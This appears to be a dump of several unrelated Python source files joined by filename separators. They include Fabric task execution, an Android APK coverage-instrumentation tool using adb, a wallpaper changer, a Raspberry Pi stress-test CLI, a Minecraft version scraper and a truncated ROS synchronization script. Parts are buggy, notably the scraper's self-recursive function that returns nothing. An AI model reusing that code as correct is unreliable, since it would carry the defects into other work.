# TODO: make it so that this wraps other decorators as expected
def __init__(self, alias=None, aliases=None, default=False, name=None,
*args, **kwargs):
if alias is not None:
self.aliases = [alias, ]
if aliases is not None:
self.aliases = aliases
if name is not None:
self.name = name
self.is_default = default
def __details__(self):
return get_task_details(self.run)
def run(self):
raise NotImplementedError
def get_hosts_and_effective_roles(self, arg_hosts, arg_roles, arg_exclude_hosts, env=None):
"""
Return a tuple containing the host list the given task should be using
and the roles being used.
See :ref:`host-lists` for detailed documentation on how host lists are
set.
.. versionchanged:: 1.9
"""
env = env or {'hosts': [], 'roles': [], 'exclude_hosts': []}
roledefs = env.get('roledefs', {})
# Command line per-task takes precedence over anything else.
if arg_hosts or arg_roles:
return merge(arg_hosts, arg_roles, arg_exclude_hosts, roledefs), arg_roles
# Decorator-specific hosts/roles go next
func_hosts = getattr(self, 'hosts', [])
func_roles = getattr(self, 'roles', [])
if func_hosts or func_roles:
return merge(func_hosts, func_roles, arg_exclude_hosts, roledefs), func_roles
# Finally, the env is checked (which might contain globally set lists
# from the CLI or from module-level code). This will be the empty list
# if these have not been set -- which is fine, this method should
# return an empty list if no hosts have been set anywhere.
env_vars = map(_get_list(env), "hosts roles exclude_hosts".split())
env_vars.append(roledefs)
return merge(*env_vars), env.get('roles', [])
def get_pool_size(self, hosts, default):
# Default parallel pool size (calculate per-task in case variables
# change)
default_pool_size = default or len(hosts)
# Allow per-task override
# Also cast to int in case somebody gave a string
from_task = getattr(self, 'pool_size', None)
pool_size = int(from_task or default_pool_size)
# But ensure it's never larger than the number of hosts
pool_size = min((pool_size, len(hosts)))
# Inform user of final pool size for this task
if state.output.debug:
print("Parallel tasks now using pool size of %d" % pool_size)
return pool_size
class WrappedCallableTask(Task):
"""
Wraps a given callable transparently, while marking it as a valid Task.
Generally used via `~fabric.decorators.task` and not directly.
.. versionadded:: 1.1
.. seealso:: `~fabric.docs.unwrap_tasks`, `~fabric.decorators.task`
"""
def __init__(self, callable, *args, **kwargs):
super(WrappedCallableTask, self).__init__(*args, **kwargs)
self.wrapped = callable
# Don't use getattr() here -- we want to avoid touching self.name
# entirely so the superclass' value remains default.
if hasattr(callable, '__name__'):
if self.name == 'undefined':
self.__name__ = self.name = callable.__name__
else:
self.__name__ = self.name
if hasattr(callable, '__doc__'):
self.__doc__ = callable.__doc__
if hasattr(callable, '__module__'):
self.__module__ = callable.__module__
def __call__(self, *args, **kwargs):
return self.run(*args, **kwargs)
def run(self, *args, **kwargs):
return self.wrapped(*args, **kwargs)
def __getattr__(self, k):
return getattr(self.wrapped, k)
def __details__(self):
orig = self
while 'wrapped' in orig.__dict__:
orig = orig.__dict__.get('wrapped')
return get_task_details(orig)
def requires_parallel(task):
"""
Returns True if given ``task`` should be run in parallel mode.
Specifically:
* It's been explicitly marked with ``@parallel``, or:
* It's *not* been explicitly marked with ``@serial`` *and* the global
parallel option (``env.parallel``) is set to ``True``.
"""
return (
(state.env.parallel and not getattr(task, 'serial', False))
or getattr(task, 'parallel', False)
)
def _parallel_tasks(commands_to_run):
return any(map(
lambda x: requires_parallel(crawl(x[0], state.commands)),
commands_to_run
))
def _is_network_error_ignored():
return not state.env.use_exceptions_for['network'] and state.env.skip_bad_hosts
def _execute(task, host, my_env, args, kwargs, jobs, queue, multiprocessing):
"""
Primary single-host work body of execute()
"""
# Log to stdout
if state.output.running and not hasattr(task, 'return_value'):
print("[%s] Executing task '%s'" % (host, my_env['command']))
# Create per-run env with connection settings
local_env = to_dict(host)
local_env.update(my_env)
# Set a few more env flags for parallelism
if queue is not None:
local_env.update({'parallel': True, 'linewise': True})
# Handle parallel execution
if queue is not None: # Since queue is only set for parallel
name = local_env['host_string']
# Wrap in another callable that:
# * expands the env it's given to ensure parallel, linewise, etc are
# all set correctly and explicitly. Such changes are naturally
# insulted from the parent process.
# * nukes the connection cache to prevent shared-access problems
# * knows how to send the tasks' return value back over a Queue
# * captures exceptions raised by the task
def inner(args, kwargs, queue, name, env):
state.env.update(env)
def submit(result):
queue.put({'name': name, 'result': result})
try:
state.connections.clear()
submit(task.run(*args, **kwargs))
except BaseException, e: # We really do want to capture everything
# SystemExit implies use of abort(), which prints its own
# traceback, host info etc -- so we don't want to double up
# on that. For everything else, though, we need to make
# clear what host encountered the exception that will
# print.
if e.__class__ is not SystemExit:
if not (isinstance(e, NetworkError) and
_is_network_error_ignored()):
sys.stderr.write("!!! Parallel execution exception under host %r:\n" % name)
submit(e)
# Here, anything -- unexpected exceptions, or abort()
# driven SystemExits -- will bubble up and terminate the
# child process.
if not (isinstance(e, NetworkError) and
_is_network_error_ignored()):
raise
# Stuff into Process wrapper
kwarg_dict = {
'args': args,
'kwargs': kwargs,
'queue': queue,
'name': name,
'env': local_env,
}
p = multiprocessing.Process(target=inner, kwargs=kwarg_dict)
# Name/id is host string
p.name = name
# Add to queue
jobs.append(p)
# Handle serial execution
else:
with settings(**local_env):
return task.run(*args, **kwargs)
def _is_task(task):
return isinstance(task, Task)
def execute(task, *args, **kwargs):
"""
Execute ``task`` (callable or name), honoring host/role decorators, etc.
``task`` may be an actual callable object, or it may be a registered task
name, which is used to look up a callable just as if the name had been
given on the command line (including :ref:`namespaced tasks <namespaces>`,
e.g. ``"deploy.migrate"``.
The task will then be executed once per host in its host list, which is
(again) assembled in the same manner as CLI-specified tasks: drawing from
:option:`-H`, :ref:`env.hosts <hosts>`, the `~fabric.decorators.hosts` or
`~fabric.decorators.roles` decorators, and so forth.
``host``, ``hosts``, ``role``, ``roles`` and ``exclude_hosts`` kwargs will
be stripped out of the final call, and used to set the task's host list, as
if they had been specified on the command line like e.g. ``fab
taskname:host=hostname``.
Any other arguments or keyword arguments will be passed verbatim into
``task`` (the function itself -- not the ``@task`` decorator wrapping your
function!) when it is called, so ``execute(mytask, 'arg1',
kwarg1='value')`` will (once per host) invoke ``mytask('arg1',
kwarg1='value')``.
:returns:
a dictionary mapping host strings to the given task's return value for
that host's execution run. For example, ``execute(foo, hosts=['a',
'b'])`` might return ``{'a': None, 'b': 'bar'}`` if ``foo`` returned
nothing on host `a` but returned ``'bar'`` on host `b`.
In situations where a task execution fails for a given host but overall
progress does not abort (such as when :ref:`env.skip_bad_hosts
<skip-bad-hosts>` is True) the return value for that host will be the
error object or message.
.. seealso::
:ref:`The execute usage docs <execute>`, for an expanded explanation
and some examples.
.. versionadded:: 1.3
.. versionchanged:: 1.4
Added the return value mapping; previously this function had no defined
return value.
"""
my_env = {'clean_revert': True}
results = {}
# Obtain task
is_callable = callable(task)
if not (is_callable or _is_task(task)):
# Assume string, set env.command to it
my_env['command'] = task
task = crawl(task, state.commands)
if task is None:
msg = "%r is not callable or a valid task name" % (my_env['command'],)
if state.env.get('skip_unknown_tasks', False):
warn(msg)
return
else:
abort(msg)
# Set env.command if we were given a real function or callable task obj
else:
dunder_name = getattr(task, '__name__', None)
my_env['command'] = getattr(task, 'name', dunder_name)
# Normalize to Task instance if we ended up with a regular callable
if not _is_task(task):
task = WrappedCallableTask(task)
# Filter out hosts/roles kwargs
new_kwargs, hosts, roles, exclude_hosts = parse_kwargs(kwargs)
# Set up host list
my_env['all_hosts'], my_env['effective_roles'] = task.get_hosts_and_effective_roles(hosts, roles,
exclude_hosts, state.env)
parallel = requires_parallel(task)
if parallel:
# Import multiprocessing if needed, erroring out usefully
# if it can't.
try:
import multiprocessing
except ImportError:
import traceback
tb = traceback.format_exc()
abort(tb + """
At least one task needs to be run in parallel, but the
multiprocessing module cannot be imported (see above
traceback.) Please make sure the module is installed
or that the above ImportError is fixed.""")
else:
multiprocessing = None
# Get pool size for this task
pool_size = task.get_pool_size(my_env['all_hosts'], state.env.pool_size)
# Set up job queue in case parallel is needed
queue = multiprocessing.Queue() if parallel else None
jobs = JobQueue(pool_size, queue)
if state.output.debug:
jobs._debug = True
# Call on host list
if my_env['all_hosts']:
# Attempt to cycle on hosts, skipping if needed
for host in my_env['all_hosts']:
try:
results[host] = _execute(
task, host, my_env, args, new_kwargs, jobs, queue,
multiprocessing
)
except NetworkError, e:
results[host] = e
# Backwards compat test re: whether to use an exception or
# abort
if not state.env.use_exceptions_for['network']:
func = warn if state.env.skip_bad_hosts else abort
error(e.message, func=func, exception=e.wrapped)
else:
raise
# If requested, clear out connections here and not just at the end.
if state.env.eagerly_disconnect:
disconnect_all()
# If running in parallel, block until job queue is emptied
if jobs:
err = "One or more hosts failed while executing task '%s'" % (
my_env['command']
)
jobs.close()
# Abort if any children did not exit cleanly (fail-fast).
# This prevents Fabric from continuing on to any other tasks.
# Otherwise, pull in results from the child run.
ran_jobs = jobs.run()
for name, d in ran_jobs.iteritems():
if d['exit_code'] != 0:
if isinstance(d['results'], NetworkError) and \
_is_network_error_ignored():
error(d['results'].message, func=warn, exception=d['results'].wrapped)
elif isinstance(d['results'], BaseException):
error(err, exception=d['results'])
else:
error(err)
results[name] = d['results']
# Or just run once for local-only
else:
with settings(**my_env):
results['<local-only>'] = task.run(*args, **new_kwargs)
# Return what we can from the inner task executions
return results
|
smiler.py
|
import os
import subprocess
import re
import shutil
import threading
import signal
import logging
import time
from config import config
from granularity import Granularity
from instrumenting import manifest_instrumenter
from libs.libs import Libs
from instrumenting.apkil.smalitree import SmaliTree
from instrumenting.apktool_interface import ApktoolInterface
from instrumenting.smali_instrumenter import Instrumenter
from instrumenting.utils import timeit
from instrumenting.utils import Utils
apk_info_pattern = re.compile("package: name='(?P<package>.*?)'")
CRASH_REPORT_FILENAME = "errors.txt"
def install(new_apk_path):
logging.info("installing")
cmd = '{} install -r "{}"'.format(config.adb_path, new_apk_path)
out = request_pipe(cmd)
logging.info(out)
def uninstall(package):
logging.info("uninstalling")
cmd = '{} uninstall "{}"'.format(config.adb_path, package)
out = request_pipe(cmd)
logging.info(out)
def request_pipe(cmd):
pipe = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
out, err = pipe.communicate()
res = out
if not out:
res = err
if pipe.returncode > 0:
raise Exception("----------------------------------------------------\n\
Out: %s\nError: %s" % (out, err))
return res
def get_apk_properties(path):
info_cmd = "%s dump badging %s" % (config.aapt_path, path)
out = request_pipe(info_cmd)
matched = re.match(apk_info_pattern, out)
package_name = matched.group('package')
return apkinfo(package_name, "", "")
def get_package_files_list(package_name):
cmd = '%s shell ls "/mnt/sdcard/%s/"' % (config.adb_path, package_name)
out = request_pipe(cmd)
files = [f for f in out.split() if not f.endswith('/')]
return files
def get_execution_results(package_name, output_dir):
result_files = get_package_files_list(package_name)
coverage_files = [f for f in result_files if f.endswith(".ec")]
crash_file = CRASH_REPORT_FILENAME if CRASH_REPORT_FILENAME in result_files else None
if not (coverage_files or crash_file):
raise Exception("No coverage or crash report files have been detected on the device for {} package.\n\
Run acvtool with \'-start\' argument to produce coverage.".format(package_name))
if os.path.exists(output_dir):
shutil.rmtree(output_dir)
os.makedirs(output_dir)
for f in result_files:
adb_pull(package_name, f, output_dir)
adb_delete_files(package_name, f)
if crash_file:
adb_pull(package_name, crash_file, output_dir)
adb_delete_files(package_name, crash_file)
def adb_pull(package_name, file_path, pull_to):
cmd = "%s pull mnt/sdcard/%s/%s %s" % (config.adb_path, package_name, file_path, os.path.abspath(pull_to))
out = request_pipe(cmd)
logging.info(out)
def adb_delete_files(package_name, file_name):
cmd = "%s shell rm mnt/sdcard/%s/%s" % (config.adb_path, package_name, file_name)
out = request_pipe(cmd)
def grant_storage_permission(package):
read_storage_cmd = "{0} shell pm grant {1} android.permission.READ_EXTERNAL_STORAGE".format(config.adb_path, package)
subprocess.call(read_storage_cmd, shell=True)
write_storage_cmd = "{0} shell pm grant {1} android.permission.WRITE_EXTERNAL_STORAGE".format(config.adb_path, package)
subprocess.call(write_storage_cmd, shell=True)
def start_instrumenting(package, release_thread=False, onstop=None, timeout=None):
grant_storage_permission(package)
lock_thread = "" if release_thread else "-w"
cmd = '{} shell am instrument -e coverage true {} {}/{}'.format(config.adb_path, lock_thread, package, config.INSTRUMENTING_NAME)
if release_thread:
os.system(cmd)
return
out = ''
def run():
out = request_pipe(cmd)
logging.info(out)
original_sigint = signal.getsignal(signal.SIGINT)
def stop(signum, frame):
signal.signal(signal.SIGINT, original_sigint)
stop_instrumenting(package, timeout)
if onstop:
onstop()
t = threading.Thread(target=run)
t.start()
print("Press Ctrl+C to finish ...")
signal.signal(signal.SIGINT, stop)
def coverage_is_locked(package_name):
cmd = "{} shell \"test -e /mnt/sdcard/{}.lock > /dev/null 2>&1 && echo \'1\' || echo \'0\'\"".format(config.adb_path, package_name)
logging.debug('Command to check lock file:' + cmd)
locked = subprocess.check_output(cmd, shell=True).replace("\n","").replace("\r", "")
return locked == '1'
def stop_instrumenting(package_name, timeout=None):
cmd = "{} shell am broadcast -a 'tool.acv.finishtesting'".format(config.adb_path)
logging.info("finish testing")
result = subprocess.call(cmd, shell=True)
logging.info(result)
locked = coverage_is_locked(package_name)
if timeout is None:
timeout = config.default_onstop_timeout
while locked and timeout:
logging.info("wait until the coverage file is saved {}".format(package_name))
time.sleep(1)
locked = coverage_is_locked(package_name)
timeout -= 1
files = get_package_files_list(package_name)
coverage_files = [f for f in files if f.endswith(".ec")]
crash_file = CRASH_REPORT_FILENAME if CRASH_REPORT_FILENAME in files else None
logging.info("coverage files at /mnt/sdcard/{0}:".format(package_name))
logging.info("\n".join(coverage_files))
if crash_file:
logging.info("crash report /mnt/sdcard/{0}/{1}".format(package_name, crash_file))
@timeit
def instrument_apk(apk_path, result_dir, dbg_start=None, dbg_end=None, installation=False, granularity=Granularity.default, mem_stats=None):
'''
I assume that the result_dir is empty is checked.
'''
apktool = ApktoolInterface(javaPath = config.APKTOOL_JAVA_PATH,
javaOpts = config.APKTOOL_JAVA_OPTS,
pathApktool = Libs.APKTOOL_PATH,
jarApktool = Libs.APKTOOL_PATH)
package = get_apk_properties(apk_path).package
unpacked_data_path = decompile_apk(apktool, apk_path, package, result_dir)
manifest_path = get_path_to_manifest(unpacked_data_path)
logging.info("decompiled {0}".format(package))
instrument_manifest(manifest_path)
smali_code_path = get_path_to_smali_code(unpacked_data_path)
pickle_path = get_pickle_path(apk_path, result_dir)
instrument_smali_code(smali_code_path, pickle_path, package, granularity, dbg_start, dbg_end, mem_stats)
logging.info("instrumented")
instrumented_package_path = get_path_to_instrumented_package(apk_path, result_dir)
remove_if_exits(instrumented_package_path)
build_apk(apktool, unpacked_data_path, instrumented_package_path)
Utils.rm_tree(unpacked_data_path)
logging.info("built")
instrumented_apk_path = get_path_to_insrumented_apk(instrumented_package_path, result_dir)
sign_align_apk(instrumented_package_path, instrumented_apk_path)
logging.info("apk instrumented: {0}".format(instrumented_apk_path))
logging.info("package name: {0}".format(package))
if installation:
install(instrumented_apk_path)
return (package, instrumented_apk_path, pickle_path)
def remove_if_exits(path):
if os.path.exists(path):
os.remove(path)
def build_dir(apktool_dir, result_dir, signature=False, installation=False):
apktool = ApktoolInterface(javaPath = config.APKTOOL_JAVA_PATH,
javaOpts = config.APKTOOL_JAVA_OPTS,
pathApktool = Libs.APKTOOL_PATH,
jarApktool = Libs.APKTOOL_PATH)
build_pkg_path = os.path.join(result_dir, "build_temp.apk")
build_apk(apktool, apktool_dir, build_pkg_path)
package = get_apk_properties(build_pkg_path).package
result_apk_path = build_pkg_path
if signature:
result_apk_path = os.path.join(result_dir, "build_{0}.apk".format(package))
sign_align_apk(build_pkg_path, result_apk_path)
print('apk was built and signed: {0}'.format(result_apk_path))
else:
print('apk was built: {0}'.format(result_apk_path))
if installation:
install(result_apk_path)
return result_apk_path
def decompile_apk(apktool, apk_path, package, result_dir):
unpacked_data_path = os.path.join(result_dir, "apktool", package)
(run_successful, cmd_output) = apktool.decode(apkPath = apk_path,
dirToDecompile = unpacked_data_path,
quiet = True,
noSrc = False,
noRes = False,
debug = False,
noDebugInfo = False,
force = True, #directory exist so without this this process finishes
frameworkTag = "",
frameworkDir = "",
keepBrokenRes = False,
forceManifest = True)
if not run_successful:
print("Run is not successful!")
return unpacked_data_path
def get_path_to_manifest(unpacked_data_path):
pth = os.path.join(unpacked_data_path, "AndroidManifest.xml")
return pth
def get_path_to_smali_code(unpacked_data_path):
pth = os.path.join(unpacked_data_path, "smali")
return pth
def get_path_to_instrumentation_metadata_dir(result_dir):
pth = os.path.join(result_dir, "metadata")
return pth
def get_path_to_insrumented_apk(apk_path, result_dir):
apk_dir, apk_fname = os.path.split(apk_path)
new_apk_fname = "{}_{}".format("instr", apk_fname)
pth = os.path.join(result_dir, new_apk_fname)
return pth
def get_path_to_instrumented_package(apk_path, result_dir):
apk_dir, apk_fname = os.path.split(apk_path)
path = os.path.join(result_dir, apk_fname)
return path
def get_pickle_path(apk_path, result_dir):
apk_dir, apk_fname = os.path.split(apk_path)
metadata_dir = get_path_to_instrumentation_metadata_dir(result_dir)
return os.path.join(metadata_dir, "{}.pickle".format(apk_fname[:-4]))
def instrument_manifest(manifest_path):
manifest_instrumenter.instrumentAndroidManifestFile(manifest_path, addSdCardPermission=True)
@timeit
def instrument_smali_code(input_smali_dir, pickle_path, package, granularity, dbg_start=None, dbg_end=None, mem_stats=None):
smali_tree = SmaliTree(input_smali_dir)
smali_instrumenter = Instrumenter(smali_tree, granularity, package, dbg_start, dbg_end, mem_stats)
smali_instrumenter.save_instrumented_smali(input_smali_dir)
smali_instrumenter.save_pickle(pickle_path)
def sign_align_apk(instrumented_package_path, output_apk):
aligned_apk_path = instrumented_package_path.replace('.apk', '_signed_tmp.apk')
align_cmd = '"{}" -f 4 "{}" "{}"'.format(config.zipalign, instrumented_package_path, aligned_apk_path)
request_pipe(align_cmd)
apksigner_cmd = '{} sign --ks {} --ks-pass pass:{} --out {} {}'\
.format(config.apksigner_path, config.keystore_path, config.keystore_password, output_apk, aligned_apk_path)
request_pipe(apksigner_cmd)
os.remove(aligned_apk_path)
def build_apk(apktool, apkdata_dir, new_apk_path):
apktool.build(srcPath=apkdata_dir, finalApk=new_apk_path, forceAll=True,
debug=False)
class apkinfo(object):
"""Properties of the apk file."""
def __init__(self, package=None, sdkversion=None, targetsdkverion=None):
self.package = package
self.sdkversion = sdkversion
self.targetsdkversion = targetsdkverion
def __repr__(self):
return "%s %s %s" % (self.package, self.sdkversion, self.targetsdkversion)
|
main.py
|
# -*- coding: UTF-8 -*-
from functions import *
command = []
used = []
TIME_INTERVAL = 600 # 更换间隔 (秒)
running = r"D:\waifu2x-caffe\waifu2x-caffe-cui.exe" # waifu2x-coffe所在文件夹
path = r'D:\Sean\我的图片\WallPaper\osusume' # 壁纸文件所在的文件夹
tmp_path = r'D:\test\tmp' # 临时文件所在的文件夹
if not os.path.exists(tmp_path):
os.mkdir(tmp_path)
paper = Command(path, tmp_path)
paper.set_interval(TIME_INTERVAL)
paper.modes('auto', 3840)
next_file = paper.get_next_file()
# next(next_file)
print("通过回车空格键确认")
paper.next()
timer = Time(paper.next, TIME_INTERVAL)
thread2 = threading.Thread(target = check_input(timer, paper), name = "输入检测")
|
cli.py
|
import argparse
import datetime
import sys
import threading
import time
import matplotlib.pyplot as plt
import numpy
import yaml
from .__about__ import __copyright__, __version__
from .main import (
cooldown,
measure_temp,
measure_core_frequency,
measure_ambient_temperature,
test,
)
def _get_version_text():
return "\n".join(
[
"stressberry {} [Python {}.{}.{}]".format(
__version__,
sys.version_info.major,
sys.version_info.minor,
sys.version_info.micro,
),
__copyright__,
]
)
def _get_parser_run():
parser = argparse.ArgumentParser(
description="Run stress test for the Raspberry Pi."
)
parser.add_argument(
"--version", "-v", action="version", version=_get_version_text()
)
parser.add_argument(
"-n",
"--name",
type=str,
default="stressberry data",
help="name the data set (default: 'stressberry data')",
)
parser.add_argument(
"-t",
"--temperature-file",
type=str,
default=None,
help="temperature file e.g /sys/class/thermal/thermal_zone0/temp (default: vcgencmd)",
)
parser.add_argument(
"-d",
"--duration",
type=int,
default=300,
help="stress test duration in seconds (default: 300)",
)
parser.add_argument(
"-i",
"--idle",
type=int,
default=150,
help="idle time in seconds at start and end of stress test (default: 150)",
)
parser.add_argument(
"--cooldown",
type=int,
default=60,
help="poll interval seconds to check for stable temperature (default: 60)",
)
parser.add_argument(
"-c",
"--cores",
type=int,
default=None,
help="number of CPU cores to stress (default: all)",
)
parser.add_argument(
"-f",
"--frequency-file",
type=str,
default=None,
help="CPU core frequency file e.g. /sys/devices/system/cpu/cpu0/cpufreq/scaling_cur_freq (default: vcgencmd)",
)
parser.add_argument(
"-a",
"--ambient",
type=str,
nargs=2,
default=None,
help="measure ambient temperature. Sensor Type [11|22|2302] <GPIO Number> e.g. 2302 26",
)
parser.add_argument("outfile", type=argparse.FileType("w"), help="output data file")
return parser
def run(argv=None):
parser = _get_parser_run()
args = parser.parse_args(argv)
# Cool down first
print("Awaiting stable baseline temperature...")
cooldown(interval=args.cooldown, filename=args.temperature_file)
# Start the stress test in another thread
t = threading.Thread(
target=lambda: test(args.duration, args.idle, args.cores), args=()
)
t.start()
times = []
temps = []
freqs = []
ambient = []
while t.is_alive():
times.append(time.time())
temps.append(measure_temp(args.temperature_file))
freqs.append(measure_core_frequency(args.frequency_file))
if args.ambient:
ambient_temperature = measure_ambient_temperature(
sensor_type=args.ambient[0], pin=args.ambient[1]
)
if ambient_temperature is None:
# Reading the sensor can return None if it times out.
# If never had a good result, probably configuration error
# Else use last known value if available or worst case set to zero
if not ambient:
message = "Could not read ambient temperature sensor {} on pin {}".format(
args.ambient[0], args.ambient[1]
)
else:
message = "WARN - Could not read ambient temperature, using last good value"
print(message)
ambient_temperature = next(
(temp for temp in reversed(ambient) if temp is not None), 0
)
ambient.append(ambient_temperature)
delta_t = temps[-1] - ambient[-1]
print(
"Temperature (current | ambient | ΔT): {:4.1f}°C | {:4.1f}°C | {:4.1f}°C - Frequency: {:4.0f}MHz".format(
temps[-1], ambient[-1], delta_t, freqs[-1]
)
)
else:
print(
"Current temperature: {:4.1f}°C - Frequency: {:4.0f}MHz".format(
temps[-1], freqs[-1]
)
)
# Choose the sample interval such that we have a respectable number of
# data points
t.join(2.0)
# normalize times
time0 = times[0]
times = [tm - time0 for tm in times]
args.outfile.write(
"# This file was created by stressberry v{} on {}\n".format(
__version__, datetime.datetime.now()
)
)
yaml.dump(
{
"name": args.name,
"time": times,
"temperature": temps,
"cpu frequency": freqs,
"ambient": ambient,
},
args.outfile,
)
return
def plot(argv=None):
parser = _get_parser_plot()
args = parser.parse_args(argv)
data = [yaml.load(f, Loader=yaml.SafeLoader) for f in args.infiles]
# sort the data such that the data series with the lowest terminal
# temperature is plotted last (and appears in the legend last)
terminal_temps = [d["temperature"][-1] for d in data]
order = [i[0] for i in sorted(enumerate(terminal_temps), key=lambda x: x[1])]
# actually plot it
fig = plt.figure()
ax1 = fig.add_subplot(1, 1, 1)
for k in order[::-1]:
if args.delta_t:
temperature_data = numpy.subtract(
data[k]["temperature"], data[k]["ambient"]
)
else:
temperature_data = data[k]["temperature"]
ax1.plot(
data[k]["time"], temperature_data, label=data[k]["name"], lw=args.line_width
)
ax1.grid()
if not args.hide_legend:
ax1.legend(loc="upper left", bbox_to_anchor=(1.03, 1.0), borderaxespad=0)
if args.delta_t:
plot_yaxis_label = "Δ temperature °C (over ambient)"
else:
plot_yaxis_label = "temperature °C"
ax1.set_xlabel("time (s)")
ax1.set_ylabel(plot_yaxis_label)
ax1.set_xlim([data[-1]["time"][0], data[-1]["time"][-1]])
if args.temp_lims:
ax1.set_ylim(*args.temp_lims)
# Only plot frequencies when using a single input file
if len(data) == 1 and args.frequency:
ax2 = plt.twinx()
ax2.set_ylabel("core frequency (MHz)")
if args.freq_lims:
ax2.set_ylim(*args.freq_lims)
try:
for k in order[::-1]:
ax2.plot(
data[k]["time"],
data[k]["cpu frequency"],
label=data[k]["name"],
color="C1",
alpha=0.9,
lw=args.line_width,
)
ax1.set_zorder(ax2.get_zorder() + 1) # put ax1 plot in front of ax2
ax1.patch.set_visible(False) # hide the 'canvas'
except KeyError():
print("Source data does not contain CPU frequency data.")
if args.outfile is not None:
plt.savefig(
args.outfile,
transparent=args.transparent,
bbox_inches="tight",
dpi=args.dpi,
)
else:
plt.show()
return
def _get_parser_plot():
parser = argparse.ArgumentParser(description="Plot stress test data.")
parser.add_argument(
"--version", "-v", action="version", version=_get_version_text()
)
parser.add_argument(
"infiles",
nargs="+",
type=argparse.FileType("r"),
help="input YAML file(s) (default: stdin)",
)
parser.add_argument(
"-o",
"--outfile",
help=(
"if specified, the plot is written to this file "
"(default: show on screen)"
),
)
parser.add_argument(
"-t",
"--temp-lims",
type=float,
nargs=2,
default=None,
help="limits for the temperature (default: data limits)",
)
parser.add_argument(
"-d",
"--dpi",
type=int,
default=None,
help="image resolution in dots per inch when written to file",
)
parser.add_argument(
"-f",
"--frequency",
help="plot CPU core frequency (single input files only)",
action="store_true",
)
parser.add_argument(
"-l",
"--freq-lims",
type=float,
nargs=2,
default=None,
help="limits for the frequency scale (default: data limits)",
)
parser.add_argument("--hide-legend", help="do not draw legend", action="store_true")
parser.add_argument(
"--not-transparent",
dest="transparent",
help="do not make images transparent",
action="store_false",
default=True,
)
parser.add_argument(
"-lw", "--line-width", type=float, default=None, help="line width"
)
parser.add_argument(
"--delta-t",
action="store_true",
default=False,
help="Use Delta-T (core - ambient) temperature instead of CPU core temperature",
)
return parser
|
versionScraper.py
|
import urllib.request, urllib.error, urllib.parse
from bs4 import BeautifulSoup
import string
import json
from threading import Thread
def _getVanilla():
def _vanillaGetDirect(url):
user_agent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7'
headers = {'User-Agent':user_agent,}
request = urllib.request.Request(url, None, headers)
response = urllib.request.urlopen(request)
text = response.read()
soup = BeautifulSoup(text)
data = soup.findAll('a', class_="button")
direct = data[0]['href']
vanilla[a['href'].split('/')[-1]] = _vanillaGetDirect("https://mcversions.net" + a['href'])
vanilla = {}
url = "https://mcversions.net/"
user_agent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7'
headers = {'User-Agent':user_agent,}
request = urllib.request.Request(url, None, headers)
response = urllib.request.urlopen(request)
text = response.read()
soup = BeautifulSoup(text)
data = soup.findAll('div', class_="items")
for div in data:
links = div.findAll('a')
for a in links:
if a['href'].startswith('/download/') and '.' in a['href'] and not (a['href'].split('/')[-1][0] in chars):
Thread(target=_vanillaGetDirect,args=("https://mcversions.net" + a['href'],)).start()
return vanilla
def _getCraftBukkit():
craftbukkit = {}
url = "https://getbukkit.org/download/craftbukkit"
user_agent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7'
headers = {'User-Agent':user_agent,}
request = urllib.request.Request(url, None, headers)
response = urllib.request.urlopen(request)
text = response.read()
soup = BeautifulSoup(text)
data = soup.findAll('div', class_="col-md-12 download")
for div in data:
metadiv = div.find('div', class_="col-sm-3")
version = str(metadiv).split('<h2>')[-1].split('</h2>')[0]
links = div.findAll('a')
for a in links:
if 'https://getbukkit.org/' in a['href']:
craftbukkit[version] = a['href']
print(craftbukkit)
def getVersions():
vanilla = _getVanilla()
craftbukkit = _getCraftBukkit()
spigot = ''
papermc = ''
print(vanilla, craftbukkit, spigot, papermc, sep='\n')
return {'Vanilla': vanilla, 'CraftBukkit': craftbukkit,
'Spigot': spigot, 'PaperMC': papermc}
chars = list(string.ascii_lowercase)
final = getVersions()
print(json.dumps(final, indent=4))
|
synchronization.py
|
#!/usr/bin/env python2.7
''' CONFIDENTIAL
Copyright (c) 2021 Eugeniu Vezeteu,
Department of Remote Sensing and Photogrammetry,
Finnish Geospatial Research Institute (FGI), National Land Survey of Finland (NLS)
PERMISSION IS HEREBY LIMITED TO FGI'S INTERNAL USE ONLY. THE CODE
MAY BE RE-LICENSED, SHARED, OR TAKEN INTO OTHER USE ONLY WITH
A WRITTEN CONSENT FROM THE HEAD OF THE DEPARTMENT.
The software is provided "as is", without warranty of any kind, express or
implied, including but not limited to the warranties of merchantability,
fitness for a particular purpose and noninfringement. In no event shall the
authors or copyright holders be liable for any claim, damages or other
liability, whether in an action of contract, tort or otherwise, arising from,
out of or in connection with the software or the use or other dealings in the
software.
'''
try:
import rospy
from sensor_msgs.msg import Image, CameraInfo, PointCloud2, PointField
from cv_bridge import CvBridge, CvBridgeError
import message_filters
import cv2
import numpy as np
import ros_numpy
import cv2.aruco as aruco
import math
import pickle
import open3d
import std_msgs.msg
import sensor_msgs.point_cloud2 as pcl2
import pcl
import matplotlib.pyplot as plt
from collections import deque
from sensor_msgs import point_cloud2
from sklearn import preprocessing
from scipy.spatial.distance import euclidean
from fastdtw import fastdtw
from testNode.msg import extras
from pyquaternion import Quaternion
import matplotlib
import pandas as pd
except:
print('Change python version')
from termcolor import colored
from scipy.spatial import distance_matrix
import struct
import rosbag
def getRGBfromI(RGBint):
blue = RGBint & 255
green = (RGBint >> 8) & 255
red = (RGBint >> 16) & 255
#return red, green, blue
return blue, green, red #return BGR
def getIfromRGB(rgb):
red = rgb[0]
green = rgb[1]
blue = rgb[2]
#print red, green, blue
RGBint = (red<<16) + (green<<8) + blue
return RGBint
def load_obj(name):
with open('/home/eugeniu/Desktop/my_data/CameraCalibration/data/saved_files/' + name + '.pkl', 'rb') as f:
return pickle.load(f)
def get_z(T_cam_world, T_world_pc, K):
R = T_cam_world[:3, :3]
t = T_cam_world[:3, 3]
proj_mat = np.dot(K, np.hstack((R, t[:, np.newaxis])))
xyz_hom = np.hstack((T_world_pc, np.ones((T_world_pc.shape[0], 1))))
xy_hom = np.dot(proj_mat, xyz_hom.T).T
z = xy_hom[:, -1]
z = np.asarray(z).squeeze()
return z
def readCalibration():
name = 'inside'
# name = 'outside'
